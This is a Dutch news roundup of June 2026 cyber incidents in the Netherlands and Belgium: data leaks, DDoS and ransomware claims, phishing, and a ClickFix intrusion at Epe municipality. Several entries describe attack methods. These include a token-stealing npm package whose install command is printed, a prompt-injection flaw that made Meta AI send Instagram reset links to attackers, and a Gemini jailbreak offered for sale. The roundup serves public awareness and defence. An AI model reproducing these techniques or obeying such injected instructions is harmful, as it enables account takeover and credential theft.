Cyberaanvallen 2026 in Nederland en België
Op deze pagina vind je per maand een actueel overzicht van bekende cyberaanvallen, datalekken en ransomware incidenten die relevant zijn voor Nederland, België en Europa.
Dagelijks bijgewerkt overzicht van cyberaanvallen, datalekken en dreigingen gericht op Nederlandse en Belgische organisaties.
Actuele cyberaanvallen en datalekken
Doorlopend bijgewerkt overzicht van cyberaanvallen, datalekken en ransomware incidenten die relevant zijn voor Nederland en België.
1.0 Slachtoffers:
02 juni 2026 | Staatssecretaris meldt mogelijk datalek in PI Vught door laptop
Staatssecretaris Van Bruggen van Justitie en Veiligheid heeft de Tweede Kamer geïnformeerd over een potentieel datalek in de Penitentiaire Inrichting (PI) Vught. Het incident betreft een laptop die aan een gedetineerde werd uitgegeven, waarop mogelijk gegevens van een andere gevangene stonden.
Gedetineerden in de PI Vught krijgen toegang tot speciale DSJ laptops om hun eigen strafdossiers digitaal in te zien. Deze laptops zijn strikt geïsoleerd; ze beschikken niet over een internetverbinding of andere faciliteiten en zijn uitsluitend bedoeld voor het raadplegen van het eigen statische strafdossier.
Onlangs meldde een gevangene van de PI Vught dat de DSJ laptop die hij had ontvangen, gegevens van een andere gedetineerde bevatte. De reguliere procedure schrijft voor dat een DSJ laptop na gebruik volledig wordt uitgeschakeld. Dit uitschakelen zorgt ervoor dat alle historie automatisch wordt verwijderd en de machine 'geschoond' wordt, voordat deze aan een volgende gedetineerde mag worden uitgegeven.
De melding van de gedetineerde doet vermoeden dat deze essentiële procedure mogelijk niet is gevolgd. Een dergelijke overtreding zou betekenen dat een gedetineerde inzage heeft gehad in gevoelige informatie van een andere gedetineerde. De staatssecretaris heeft de Tweede Kamer geïnformeerd vanwege de risicostatus van beide gedetineerden, waarbij één van hen momenteel verblijft in de Extra Beveiligde Inrichting (EBI).
Om de exacte toedracht vast te stellen en te bepalen of de werkprocedure inderdaad niet is opgevolgd, is een onderzoek gestart. Mocht uit dit onderzoek blijken dat de betreffende gedetineerde daadwerkelijk inzage heeft gehad in gegevens van een andere gedetineerde, dan zal dit als een datalek worden gemeld bij de Autoriteit Persoonsgegevens.
Bron: Tweede Kamer
03 juni 2026 | KHN waarschuwt Nederlandse hotels voor datalek na phishinggolf
Koninklijke Horeca Nederland (KHN) heeft een waarschuwing afgegeven aan hotels in Nederland over een omvangrijk datalek. Volgens de brancheorganisatie hebben gasten van hotels phishingberichten ontvangen als gevolg van dit incident. Hackers zijn erin geslaagd om binnen te dringen in de boekingssystemen van diverse hotels, waarbij gegevens van gasten zijn buitgemaakt.
KHN heeft naar aanleiding van het datalek talloze meldingen ontvangen van slachtoffers die de verdachte phishingberichten hebben ontvangen. De organisatie benadrukt de ernst van de situatie en roept hotels op alert te zijn en passende maatregelen te nemen. Details over de specifieke hotels of de omvang van het datalek zijn niet bekendgemaakt, maar de waarschuwing duidt op een breed probleem dat de Nederlandse hotelsector treft. Het is cruciaal dat hotels hun beveiligingsmaatregelen van boekingssystemen controleren en gasten informeren over mogelijke risico's.
Bron: Koninklijke Horeca Nederland (KHN)
03 juni 2026 | Elite Squad claimt DDoS aanvallen op Nederlandse universiteiten
De dreigingsactor Elite Squad heeft geclaimd DDoS aanvallen te hebben uitgevoerd op meerdere websites van Nederlandse universiteiten. Deze beweringen werden ontdekt door Cybercrimeinfo. De acties van Elite Squad zijn specifiek gericht op instellingen in Nederland.
Volgens de claims van de groep zijn de volgende Nederlandse universiteiten het doelwit geweest van de DDoS aanvallen:
* Universiteit van Amsterdam
* Erasmus Universiteit Rotterdam
* Universiteit Leiden
* Rijksuniversiteit Groningen
* Universiteit Utrecht
* Maastricht University
* Amsterdam University College
Een Distributed Denial of Service (DDoS)-aanval heeft als doel een online dienst ontoegankelijk te maken door deze te overspoelen met een grote hoeveelheid verkeer, waardoor de servers overbelast raken en legitieme gebruikers geen toegang meer krijgen. De claim van Elite Squad omvat een reeks prominente Nederlandse academische instellingen. De alert vermeldt niet of deze aanvallen succesvol waren of wat de huidige operationele status van de websites van de getroffen universiteiten is.
Bron: Darkweb
03 juni 2026 | Nederlandse religieuze instelling doelwit STORMOUS ransomware
Cybercrimeinfo ontdekte dat Katholiek Amersfoort, een religieuze instelling gevestigd in Nederland, het vermeende slachtoffer is geworden van de STORMOUS ransomwaregroep. De aanvallers beweren verantwoordelijk te zijn voor een cyberaanval en dreigen de gestolen data op het darkweb te publiceren.
Katholiek Amersfoort, bekend van haar website katholiekamersfoort.nl, is hiermee het meest recente Nederlandse doelwit dat in verband wordt gebracht met ransomware-activiteiten. De claim van de STORMOUS-groep duidt op een mogelijke datadiefstal, wat ernstige gevolgen kan hebben voor de privacy van betrokkenen en de operationele continuïteit van de instelling. Het publiceren van data op het darkweb is een veelgebruikte tactiek van ransomwaregroepen om druk uit te oefenen op slachtoffers om losgeld te betalen.
De melding van deze aanval benadrukt de aanhoudende dreiging van ransomware voor organisaties van elke omvang en sector, inclusief religieuze instellingen. Het is cruciaal voor alle entiteiten om robuuste cybersecuritymaatregelen te implementeren en incidentresponsplannen paraat te hebben om dergelijke aanvallen te mitigeren en de impact ervan te beperken.
Bron: Darkweb
03 juni 2026 | NoName claimt DDoS aanvallen op VDL Bus & Coach en VDL Group
Cybercrimeinfo heeft een melding ontvangen over vermeende DDoS aanvallen gericht op Nederlandse entiteiten. De dreigingsactor, bekend onder de naam NoName, claimt verantwoordelijk te zijn voor deze aanvallen. Specifieke doelwitten die door NoName zijn genoemd, betreffen VDL Bus & Coach en VDL Group.
Deze aanvallen zouden gericht zijn op meerdere websites binnen Nederland. DDoS aanvallen (Distributed Denial of Service) zijn methodes waarbij aanvallers proberen om online diensten en websites onbereikbaar te maken. Dit doen zij door de servers te overspoelen met een overweldigende hoeveelheid netwerkverkeer, afkomstig van een groot aantal gecompromitteerde computers of apparaten. Het gevolg hiervan is dat legitieme gebruikers geen toegang meer kunnen krijgen tot de getroffen diensten, wat kan leiden tot operationele verstoringen en financiële schade voor de getroffen organisaties.
De claims van NoName zijn op dit moment niet onafhankelijk bevestigd door de getroffen partijen of externe monitoringdiensten. De exacte aard en omvang van de vermeende aanvallen, evenals de eventuele impact op de operationele continuïteit van VDL Bus & Coach en VDL Group, zijn momenteel onduidelijk. Cybercrimeinfo blijft de situatie nauwlettend volgen voor verdere ontwikkelingen en officiële bevestigingen van de claims.
Bron: Darkweb
03 juni 2026 | Waarschuwing voor phishing namens Christelijke Mutualiteit
Er circuleren momenteel phishingberichten die misbruik maken van de naam van de Christelijke Mutualiteit in België. Deze e-mails verzoeken ontvangers om bepaalde accountgegevens te bevestigen voor een zogenaamde "administratieve controle". Dit betreft een poging tot oplichting, waarbij cybercriminelen proberen persoonlijke gegevens van de slachtoffers te bemachtigen.
Safeonweb.be waarschuwt dat dergelijke frauduleuze berichten vaak te herkennen zijn aan specifieke kenmerken. Zo wordt de ontvanger gevraagd op een link te klikken om gegevens te "bevestigen" of "aan te vullen". Deze link leidt vervolgens naar een valse website die de officiële website van de Christelijke Mutualiteit nabootst. Een ander kenmerk is het e-mailadres van de afzender, dat er vaak vreemd uitziet of kleine afwijkingen bevat, zoals overbodige letters, spelfouten of ongebruikelijke tekens. Hoewel de weergegeven afzendernaam legitiem kan lijken, is het raadzaam om op de naam te klikken of tikken om het volledige e-mailadres te controleren.
Om niet in de val te trappen, adviseert Safeonweb.be om niet op links in dergelijke verdachte e-mails te klikken, geen bijlagen te openen en geen applicaties te downloaden die in het bericht worden gevraagd. Ontvangers van deze phishingberichten wordt dringend geadviseerd de verdachte e-mail door te sturen naar verdacht@safeonweb.be.
Indien men onverhoopt toch op een link heeft geklikt, is het cruciaal om geen gegevens in te vullen en de pagina onmiddellijk te sluiten. Er mogen nooit persoonlijke codes worden doorgegeven. Als een wachtwoord is ingevoerd dat ook elders wordt gebruikt, dient dit wachtwoord onmiddellijk te worden gewijzigd. Wanneer er geld verloren is gegaan door de oplichting, is het van belang snel actie te ondernemen en het advies op de website van Safeonweb.be te volgen.
Bron: Safeonweb
04 juni 2026 | Belgische hotelgasten verliezen duizenden euro's na datalek en phishing
Een datalek dat zowel Nederlandse als Belgische hotels raakt, heeft geleid tot aanzienlijke financiële verliezen voor tal van hotelgasten. Volgens berichtgeving van Het Laatste Nieuws (HLN) zijn slachtoffers in sommige gevallen duizenden euro's kwijtgeraakt door gerichte phishingaanvallen die volgden op het datalek. Eerder werd al bekend dat zeker honderd Nederlandse hotels getroffen zijn.
De aanvallers slaagden erin om op nog onbekende wijze reserveringsgegevens te stelen van een onbekend aantal hotels en hun gasten. Deze gestolen informatie werd vervolgens ingezet voor gerichte phishingcampagnes, waarbij slachtoffers onder andere via WhatsApp werden benaderd. In de phishingberichten werd beweerd dat de ontvanger nog een openstaand bedrag moest voldoen. Er werd gedreigd met de onherroepelijke annulering van de hotelreservering indien de betaling niet binnen een gestelde termijn zou plaatsvinden.
Colin Dearman, manager van hotel Astoria in De Haan, België, heeft tegenover HLN bevestigd dat sommige gasten op deze wijze voor duizenden euro's zijn opgelicht. De omvang van het verlies varieerde afhankelijk van de duur van het geplande verblijf. Opvallend is dat mensen die hun reservering telefonisch bij de hotels hadden gemaakt, geen doelwit zijn geworden van deze phishingaanvallen.
Volgens hoteliers lijkt de "gemene deler" van alle getroffen hotels het online reserveringssysteem te zijn waarmee zij werken. Dit systeem is ontwikkeld door het Gentse softwarebedrijf Lighthouse. De software koppelt hoteladministraties aan diverse online boekingssites, waaronder Booking.com, en verzamelt centraal alle reserveringen en klantgegevens. Het Laatste Nieuws suggereert dat Lighthouse mogelijk gehackt is. Echter, in een reactie heeft Lighthouse aangegeven dat er nog geen aanwijzingen zijn gevonden voor ongeautoriseerde toegang tot hun systemen.
Bron: Het Laatste Nieuws
05 juni 2026 | Politie waarschuwt voor nepberichten over verhoogde banklimiet
De Nederlandse politie heeft recentelijk via haar Instagram-kanaal een urgente waarschuwing uitgegeven betreffende frauduleuze berichten die op bedrieglijke wijze de indruk wekken afkomstig te zijn van de Rabobank. Deze zorgwekkende berichten worden actief verspreid door cybercriminelen en zijn specifiek ontworpen om ontvangers te misleiden. In de valse communicatie wordt de ontvanger geïnformeerd dat de daglimiet van hun bankrekening succesvol is verhoogd naar een aanzienlijk bedrag van 54.000 euro. Het doel van deze mededeling is om onrust te zaaien en een gevoel van urgentie te creëren, waardoor slachtoffers sneller geneigd zijn tot actie over te gaan.
De afzenders van deze geraffineerde nepberichten instrueren de ontvanger om onmiddellijk contact op te nemen met een specifiek, in het bericht vermeld, telefoonnummer. Dit contact is vereist als de ontvanger deze substantiële limietverhoging niet zelf heeft aangevraagd. Deze tactiek is een klassiek voorbeeld van bankhelpdeskfraude, een veelvoorkomende vorm van cybercriminaliteit waarbij oplichters zich voordoen als bankmedewerkers om het vertrouwen van slachtoffers te winnen.
Zodra een argeloze ontvanger het in het nepbericht opgegeven telefoonnummer belt, komen zij in contact met de cybercriminelen. Deze criminelen proberen vervolgens via uitgekiende social engineering technieken toegang te verkrijgen tot de bankrekening van het slachtoffer. Dit kan op verschillende manieren gebeuren: door het ontfutselen van inloggegevens, het overtuigen van het slachtoffer om persoonlijke bankgegevens te delen, of zelfs door het slachtoffer te manipuleren om zelfstandig een geldbedrag over te maken naar een bankrekening die onder controle staat van de fraudeurs. De valse melding van een verhoogde daglimiet van 54.000 euro dient hierbij als een krachtig lokmiddel om angst en paniek te zaaien, waardoor slachtoffers minder kritisch worden en sneller geneigd zijn tot actie over te gaan.
De politie benadrukt met klem het belang van waakzaamheid bij het ontvangen van dergelijke ongevraagde en verdachte berichten. Het dringende advies aan alle burgers is om het telefoonnummer dat in het frauduleuze bericht wordt vermeld, onder geen enkele omstandigheid te bellen. Bij enige twijfel over de authenticiteit van een bericht van een bank, is het cruciaal om altijd zelfstandig en proactief contact op te nemen met de betreffende financiële instelling. Dit dient uitsluitend te gebeuren via de officiële en geverifieerde communicatiekanalen van de bank, zoals de officiële website of de mobiele applicatie. Deze kanalen bieden de enige betrouwbare en veilige manier om de geldigheid van dergelijke berichten te controleren en zo te voorkomen dat men slachtoffer wordt van geavanceerde fraude.
Bron: Politie
06 juni 2026 | 871 GB aan persoonsgegevens gestolen bij gemeente Epe via ClickFix
De gemeente Epe is het slachtoffer geworden van een cyberaanval waarbij een aanvaller het wachtwoord van een beheerder kraakte en toegang verkreeg tot een noodaccount. Als gevolg hiervan is 871 gigabyte aan data buitgemaakt, waaronder een export uit de Basisregistratie Personen (BRP) met gevoelige persoonsgegevens van inwoners. Dit blijkt uit een interne evaluatie van het datalek, zoals door de gemeente gepubliceerd.
De aanval begon op 10 maart dit jaar, toen een aanvaller via een zogeheten ClickFix-aanval toegang wist te verkrijgen tot het systeem van een gemeentemedewerker. Bij een aanval van het type ClickFix worden slachtoffers misleid om specifieke commando's op hun computer uit te voeren. Dit gebeurt vaak door middel van malafide CAPTCHA-pagina's die een schadelijk PowerShell commando naar het klembord kopiëren, waarna de gebruiker wordt geïnstrueerd dit commando uit te voeren in het Uitvoervenster of de Windows Terminal.
Nadat de aanvaller voet aan de grond had gekregen op het systeem van de medewerker, werd gezocht naar andere ingelogde gebruikers. Door een kerberosticket van een ingelogde beheerder te ontsleutelen, lukte het de aanvaller om het bijbehorende wachtwoord te kraken en zo toegang te krijgen via diens ticket. Vervolgens werd ook toegang verkregen tot een noodaccount, dat over uitgebreide toegangsrechten op het systeem beschikte. De gemeente stelt dat dit noodaccount, dat als een 'loper' kan worden gezien, in de regel geen meervoudige authenticatie (MFA) heeft omdat het bedoeld is voor noodtoegang. Echter, er waren onvoldoende aanvullende beveiligingsmaatregelen getroffen voor dit account, waardoor de aanvaller vergaande rechten kon verkrijgen.
Met de verworven toegang kopieerde de aanvaller met behulp van het programma AzCopy circa 871 gigabyte aan data, verspreid over ruim 550.000 bestanden, naar een externe cloudopslag, een Azure Blob Storage. De gestolen data was afkomstig van een interne bestandsserver die op korte termijn zou worden uitgefaseerd, in verband met een geplande migratie naar SharePoint en Microsoft Teams.
De buitgemaakte gegevens omvatten een export uit de BRP met persoonsgegevens van inwoners, zoals naam, adres, geslacht, woonplaats, geboortedatum en Burgerservicenummer (BSN). Daarnaast werden persoonsgegevens van medewerkers gestolen, waaronder namen, e-mailadressen, zakelijke telefoonnummers, datum indiensttreding en profielfoto's. Ook financiële gegevens van de gemeente en haar relaties, aanvragen voor gemeentelijke voorzieningen, meldingen van overlast of verstoring van de openbare orde, en kopieën van ongeveer duizend identiteitsbewijzen behoorden tot de gestolen informatie. De gemeente Epe heeft bevestigd dat de gestolen gegevens op het moment van schrijven niet zijn gepubliceerd op bekende leksites of marktplaatsen, dat er geen losgeld is geëist en dat er geen indicaties zijn van misbruik van de data.
Naar aanleiding van het incident heeft de gemeente verschillende lessen getrokken. De aanval begon met social engineering, wat benadrukt dat technische maatregelen alleen niet volstaan en medewerkers getraind moeten worden om verdachte situaties te herkennen en te melden. Het bewustwordingsprogramma voor medewerkers zal worden vernieuwd. Verder zijn werkprocessen aangepast om de opslag van gevoelige gegevens, zoals data-exports en kopieën van identiteitsbewijzen, te voorkomen. Ook is het gebruik van PowerShell en het Run-venster voor standaardgebruikers beperkt en is de netwerksegmentatie aangescherpt.
Bron: Gemeente Epe | Bron 2: radar.avrotros.nl | Bron 3: rijksoverheid.nl
06 juni 2026 | Datalek bij zakenreisbureau BCD Travel treft 396.000 accounts
De criminele groepering ShinyHunters claimt een datalek te hebben veroorzaakt bij het Nederlandse zakenreisbureau BCD Travel. De gestolen data zou gegevens van 396.000 accounts omvatten. Dit nieuws is bevestigd door beveiligingsonderzoeker Troy Hunt, oprichter van de datalekzoekmachine Have I Been Pwned, die de 396.000 e-mailadressen van de betrokken accounts aan zijn website heeft toegevoegd. Op de officiële website van BCD Travel is momenteel geen informatie over het mogelijke datalek te vinden.
Eerder liet BCD Travel aan het FD weten dat het recentelijk verdachte activiteit had waargenomen via een intern gebruikt account. Na deze ontdekking is direct een onderzoek gestart om de aard en omvang van de activiteiten vast te stellen, welk onderzoek nog gaande is. ShinyHunters maakte eind vorige maand bekend de systemen van BCD Travel te hebben gehackt en stelde een ultimatum voor losgeld, met een deadline van 1 juni. Toen deze deadline verstreek, publiceerden de cybercriminelen eerder deze week een dataset van dertig gigabyte, die afkomstig zou zijn van BCD Travel. De groep beweert in totaal de gegevens van meer dan 700.000 accounts te hebben buitgemaakt.
De dataset bevat, naast andere informatie, de 396.000 e-mailadressen die nu zijn opgenomen in de database van Have I Been Pwned. Deze website stelt gebruikers in staat te controleren of hun e-mailadres is betrokken bij bekende datalekken. Opvallend is dat slechts 28 procent van de e-mailadressen die nu bij BCD Travel zouden zijn gestolen, al bekend was via een eerder datalek bij Have I Been Pwned. Dit percentage is aanzienlijk lager dan bij veel andere datalekken, waar een groter deel van de gelekte adressen al eerder in omloop bleek te zijn.
Bron: Have I Been Pwned
07 juni 2026 | Belgische vrouw verliest spaargeld door geraffineerde online oplichting met nepvacature
Een alleenstaande moeder uit Aarschot, de 45-jarige Ellie Dewinter, is al haar spaargeld kwijtgeraakt door een geraffineerde vorm van online oplichting. Dewinter solliciteerde online voor een flexi-job in het weekend, in de hoop wat extra geld te verdienen. Binnen enkele minuten na haar online sollicitatie was haar rekening leeggeplunderd. Ze verklaarde: "In 5 minuten tijd was ik alles kwijt." Het ging om geld waarvoor ze maandenlang had gespaard.
De internetcriminelen gingen volgens de politie zeer gewiekst te werk. Hoewel de specifieke methoden van de oplichters niet in detail zijn beschreven, waarschuwt de politie voor het belang van voorzichtigheid bij online sollicitaties. Een belangrijke indicator voor potentiële fraude is wanneer er sprake is van haast. "Als er haast bij is, klopt er iets niet," aldus de waarschuwing van de politie, die benadrukt dat dit een veelvoorkomend kenmerk is van dergelijke zwendelpraktijken. Het incident onderstreept de noodzaak voor burgers om alert te zijn op verdachte signalen bij online interacties, vooral wanneer financiële gegevens of snelle beslissingen worden gevraagd.
Bron: HLN.be
Dreigingen
4.0 Dreigingen:
01 juni 2026 | Populaire ontwikkeltool voor AI steelt OpenAI refresh tokens
Een veelgebruikte softwaretool, die door duizenden mobiele ontwikkelaars is gedownload, is ontdekt terwijl deze heimelijk authenticatietokens steelt. Op 27 mei 2026 publiceerde Aikido Security onderzoek over een kwaadaardig pakket op npm genaamd `codexui-android`. Dit pakket, een populaire webinterface op afstand voor OpenAI Codex (een taalmodel dat code schrijft), wordt wekelijks ongeveer 27.000 keer gedownload.
Charlie Eriksen, onderzoeker bij Aikido Security, ontdekte dat dit pakket vorige maand een supply chain aanval uitvoerde om gebruikersdata te stelen. Opmerkelijk is dat de aanvallers geen standaardmethoden zoals typosquatting of accountkaping gebruikten. In plaats daarvan ontwikkelden ze een daadwerkelijk nuttige tool, vermoedelijk om een legitieme gebruikersbasis op te bouwen voordat deze werd bewapend. Het kwaadaardige code bestaat niet in de publieke repository op GitHub, maar verschijnt alleen in het gepubliceerde pakket op npm, waardoor een standaard audit van de broncode dit zou missen.
De aanval wordt direct geactiveerd bij het laden van de module. De eerste regel van `dist-cli/index.js` importeert een verborgen script genaamd `chunk-PUR7OUAG.js`. Dit script controleert snel op lokale referenties. Indien gevonden, wordt een exfiltratieroutine gestart om `access_token`, `id_token`, `account ID` en de `refresh_token` uit het `auth.json`-bestand te stelen. Een bijzonder problematisch aspect is dat een `refresh_token` niet verloopt, waardoor aanvallers zich voor onbepaalde tijd kunnen voordoen als het slachtoffer.
Om het netwerkverkeer te verbergen, stuurt de code de gestolen gegevens naar een endpoint van de server genaamd `sentry.anyclawstore`. Deze naam werd opzettelijk gekozen om op te gaan in de normale telemetrie voor foutrapportage van Sentry. In de verborgen source map liet de auteur zelfs een duidelijke opmerking achter: "Send tokens to our startlog endpoint (always)".
De onderzoekers merkten in een blogpost op dat deze dreigingsactor ook Android mobiele apparaten target. De auteur publiceerde apps in de Google Play Store onder de ontwikkelaarsidentiteit BrutalStrike, die ook eigenaar is van een legitiem mobiel spel met meer dan 5 miljoen downloads. Twee specifieke apps, een betaalde productiviteitsapp genaamd `codex.app` en een andere genaamd "OpenClaw Codex Claude AI Agent", bevatten dezelfde kwaadaardige infrastructuur.
De apps voor Android doorstaan gemakkelijk de voorpublicatie beveiligingsscans van Google, omdat het initiële APK bestand van 26 MB er volledig schoon uitziet. Eenmaal geïnstalleerd, extraheert de app een Linux userland afgeleid van Termux naar privéopslag en start Node.js met behulp van PRoot. Vervolgens wordt een commando uitgevoerd om de nieuwste versie van het pakket op npm te installeren: `pnpm add codexui-android@latest`. De exfiltratie is actief sinds versie `2.1.0`.
Toen Eriksen de auteur confronteerde, plaatste deze kort een opmerking waarin hij beweerde de toegang tot zijn account op npm te zijn kwijtgeraakt. Dit werd kort daarna verwijderd en vervangen door een bedrijfsverklaring waarin elke diefstal van referenties werd ontkend. Vanaf vandaag zijn de kwaadaardige softwarepakketten en apps nog steeds online beschikbaar. De onderzoekers concludeerden: "ontwikkeltools voor AI worden een doelwit van hoge waarde, juist omdat de tokens krachtig en langdurig zijn... een dreigingsactor heeft veel moeite geïnvesteerd in het bouwen van een geloofwaardig, nuttig project om als dekmantel te gebruiken. De legitimiteit is de aanvalsvector. Naarmate tools voor AI zich verspreiden en ontwikkelaars naar productiviteitssnelkoppelingen grijpen, verwacht dan meer van dit soort aanvallen."
Bron: Aikido Security
01 juni 2026 | Crimineel biedt vermeende exploit voor promptinjectie in Gemini 3.1 te koop aan op ondergronds forum
Op een ondergronds forum is een aanbod verschenen voor een exploit die volgens de aanbieder misbruikmaakt van promptinjectie in het taalmodel Gemini 3.1. De crimineel claimt dat deze exploit de ingebouwde beveiligingsregels van het grote taalmodel kan omzeilen. Hoewel de advertentie geen specifieke technische details bevat, wordt er wel gesproken over een 'proof of concept' met bijbehorende screenshots en voorbeelden, die op verzoek beschikbaar zouden zijn voor geïnteresseerde kopers. De prijs voor de exploit wordt via privécontact besproken.
De claims over de functionaliteit van de exploit zijn op dit moment niet onafhankelijk geverifieerd. Er is geen informatie beschikbaar over welke specifieke versies van Gemini 3.1 kwetsbaar zouden zijn, welke vereisten er zijn voor een succesvolle aanval, of hoe betrouwbaar de aangeboden methode daadwerkelijk is. Dit aanbod past in een bredere, zorgwekkende trend waarbij technieken zoals 'jailbreaks' en promptinjectie voor taalmodellen steeds vaker als handelswaar op criminele markten verschijnen.
Organisaties die toepassingen inzetten die gebaseerd zijn op grote taalmodellen, doen er goed aan om proactieve beveiligingsmaatregelen te treffen. Dit omvat het zorgvuldig valideren van alle invoer, het continu monitoren van de uitvoer van de modellen, het strikt scheiden van rechten en het alert zijn op signalen die kunnen duiden op aanvallen via promptinjectie. Door deze stappen te volgen, kunnen potentiële risico's worden beperkt.
Bron: Cybercrimeinfo
01 juni 2026 | Lek in Meta AI maakte kaping van Instagramaccounts mogelijk, gearchiveerd account van het Witte Huis bekendste slachtoffer
Een ernstige kwetsbaarheid in de digitale assistent Meta AI van Instagram maakte het mogelijk om accounts over te nemen, zelfs als deze waren beveiligd met tweefactorauthenticatie. Kwaadwillenden konden door middel van promptinjectie, een techniek waarbij misleidende instructies worden gegeven, de assistent zover krijgen dat deze een wachtwoordherstelcode of een herstellink naar het e-mailadres van de aanvaller stuurde. Dit proces omzeilde de gebruikelijke identiteitscontroles van Instagram.
Elke aanvaller die de gebruikersnaam van een doelwit kende, kon dit overnameproces in gang zetten. De methode omvatte het gebruik van een VPN die overeenkwam met de geografische locatie van het doelwit. Vervolgens vroeg de aanvaller via de Meta AI een wachtwoordherstel aan, waarbij een eigen e-mailadres werd opgegeven voor de ontvangst van de herstellink of code.
Een prominent slachtoffer van deze methode was het gearchiveerde Instagramaccount van het Witte Huis uit de regeringsperiode van voormalig president Barack Obama. Dit account, dat sinds januari 2017 niet meer actief werd gebruikt, werd misbruikt om een afbeelding met een politieke boodschap te plaatsen. Meta heeft de hack inmiddels bevestigd, het account veiliggesteld en de ongeautoriseerd geplaatste inhoud verwijderd.
Volgens beveiligingsonderzoekers zijn op deze manier meer hoogwaardige accounts en korte, gewilde gebruikersnamen overgenomen, waarna ze werden doorverkocht via Telegram. Meta heeft verklaard dat de kwetsbaarheid inmiddels is verholpen. Dit incident benadrukt hoe digitale assistenten een nieuw en significant aanvalsoppervlak introduceren zodra zij in staat zijn gevoelige acties zoals wachtwoordherstel uit te voeren.
Bron: Neowin | Bron 2: tmz.com
02 juni 2026 | Chrome koppelt sessiecookies aan hardware ter bescherming tegen accountovernames
Google introduceert een nieuwe beveiligingsfunctie in de Chrome-browser, genaamd Device Bound Session Credentials (DBSC), die ingelogde sessies cryptografisch koppelt aan het specifieke toestel waarop ze zijn aangemaakt. Deze maatregel is ontworpen om het voor cybercriminelen aanzienlijk moeilijker te maken om gestolen sessiecookies te misbruiken voor accountovernames.
Sessiecookies zijn al geruime tijd een geliefd doelwit voor aanvallers. Wanneer een aanvaller een sessiecookie bemachtigt, kan deze zich voordoen als een reeds aangemelde gebruiker, waardoor een nieuw wachtwoord of een multifactorauthenticatieproces niet nodig is. Dit maakt sessiekaping een bijzonder efficiënte methode voor het overnemen van accounts.
DBSC pakt dit probleem aan door sessies te verbinden met de unieke hardware van een apparaat. Op systemen met Windows maakt Chrome hiervoor gebruik van de Trusted Platform Module (TPM), terwijl toestellen met macOS de Secure Enclave inzetten. Bij het inloggen genereert Chrome niet alleen een sessiecookie, maar ook een cryptografisch sleutelpaar. De sessie blijft zodoende onlosmakelijk verbonden met die specifieke hardware. Een aanvaller die enkel de cookie weet te stelen, beschikt daardoor niet over de essentiële sleutels die nodig zijn om de sessie te misbruiken. Google verwacht dat dit de bruikbaarheid van gestolen sessies voor accountovernames aanzienlijk zal verminderen.
Google kondigde DBSC reeds in 2024 aan en is nu gestart met de brede uitrol van de functionaliteit. De functie wordt automatisch geactiveerd en kan niet handmatig worden uitgeschakeld door gebruikers. Voor klanten van Google Workspace zijn er geen administratieve handelingen vereist. Om DBSC te kunnen gebruiken, moeten systemen minimaal Chrome 146 draaien op Windows of Chrome 148 op macOS. Daarnaast is compatibele hardware noodzakelijk, zoals een TPM-chip op Windows systemen en de Secure Enclave op Macs.
Deze beveiligingsmaatregel komt op een moment dat malware die browsergegevens steelt, waaronder sessiecookies, steeds vaker wordt ingezet. Hoewel DBSC deze specifieke aanvalsvector minder aantrekkelijk maakt, benadrukt Google dat gebruikers waakzaam moeten blijven. De nieuwe beveiliging beschermt tegen het misbruik van gestolen cookies, maar voorkomt niet dat malware andere gevoelige gegevens buitmaakt.
Bron: itdaily.com
02 juni 2026 | Dashlane gebruikersaccounts vergrendeld na brute force aanvallen
Dashlane, een bekende wachtwoordmanager, heeft een beveiligingsincident openbaar gemaakt waarbij gebruikersaccounts het doelwit waren van een grootschalige brute force aanval. De aanval begon op 31 mei 2026, zo meldt het bedrijf. Een externe dreigingsactor probeerde de twee-factor authenticatie (2FA) beveiligingen te omzeilen door herhaaldelijk authenticatiecodes te raden. Het doel was om ongeautoriseerde apparaten te registreren op de accounts van slachtoffers.
De aanval werd gedetecteerd door de geautomatiseerde beveiligingssystemen van Dashlane. Deze systemen reageerden door de verdachte activiteiten te blokkeren en de getroffen gebruikersaccounts preventief te vergrendelen. Dit leidde tot de vergrendeling van meerdere accounts, waardoor gebruikers tijdelijk geen toegang hadden tot hun wachtwoordmanager.
Een brute force aanval is een methode waarbij aanvallers systematisch combinaties van wachtwoorden of, in dit geval, authenticatiecodes proberen totdat de juiste combinatie wordt gevonden. Door het herhaaldelijk raden van 2FA-codes hoopten de aanvallers een tweede beveiligingslaag te doorbreken die normaal gesproken toegang tot een account beschermt, zelfs als het wachtwoord bekend is. Het succesvol registreren van een ongeautoriseerd apparaat zou de dreigingsactor in staat stellen om toekomstige inlogpogingen uit te voeren zonder de noodzaak van de 2FA-code, wat een aanzienlijk risico vormt voor de privacy en veiligheid van de opgeslagen gegevens.
Dashlane heeft in reactie op het incident stappen ondernomen om de beveiliging verder te versterken en gebruikers te informeren over de situatie. Hoewel de geautomatiseerde verdedigingsmechanismen de aanvallen hebben afgeslagen en ongeautoriseerde toegang tot zover bekend is voorkomen, benadrukt het incident het voortdurende gevaar van gerichte cyberaanvallen op accounts die gevoelige informatie bevatten, zoals wachtwoorden. Gebruikers van Dashlane die getroffen zijn, zullen waarschijnlijk instructies ontvangen om hun account te herstellen en opnieuw te beveiligen.
Bron: Dashlane
02 juni 2026 | DriveSurge misbruikt duizenden websites voor ClickFix en FakeUpdates malware
Een dreigingsactor, bekend als DriveSurge, voert grootschalige malware-distributiecampagnes uit door middel van ClickFix- en FakeUpdates-technieken op gecompromitteerde websites. Volgens onderzoekers van cybersecuritybedrijf SilentPush zijn duizenden websites gecompromitteerd in DriveSurge-campagnes om bezoekers om te leiden naar infrastructuur voor malwarelevering.
ClickFix is een social engineering tactiek die slachtoffers verleidt tot het kopiëren en uitvoeren van kwaadaardige commando's op hun systemen, vaak resulterend in malware-infecties onder het mom van het oplossen van een technisch probleem. Bij FakeUpdates-aanvallen lokken dreigingsactoren slachtoffers met frauduleuze software-updateprompts, meestal door browserupdates na te bootsen, om hen te verleiden tot het downloaden en installeren van kwaadaardige payloads.
SilentPush-onderzoekers melden dat de dreigingsactor DriveSurge voornamelijk functioneert als een initial access broker (IAB) die opereert op een pay-per-install (PPI) model, wat verdere aanvallen mogelijk maakt. Bezoekers van gecompromitteerde websites worden omgeleid via een Traffic Distribution System (TDS) genaamd zTDS. Dit systeem profileert hen en bepaalt of een FakeUpdates- of een ClickFix-lokmiddel geschikter is. zTDS is een open-source TDS dat al sinds minstens 2015 bestaat en dat DriveSurge sinds minstens september 2025 gebruikt. SilentPush stelt dat DriveSurge met zTDS duizenden legitieme websites met een hoge reputatie kaapt en bezoekers stilzwijgend omleidt naar malware, zonder medeweten van de eigenaren van de sites of hun bezoekers.
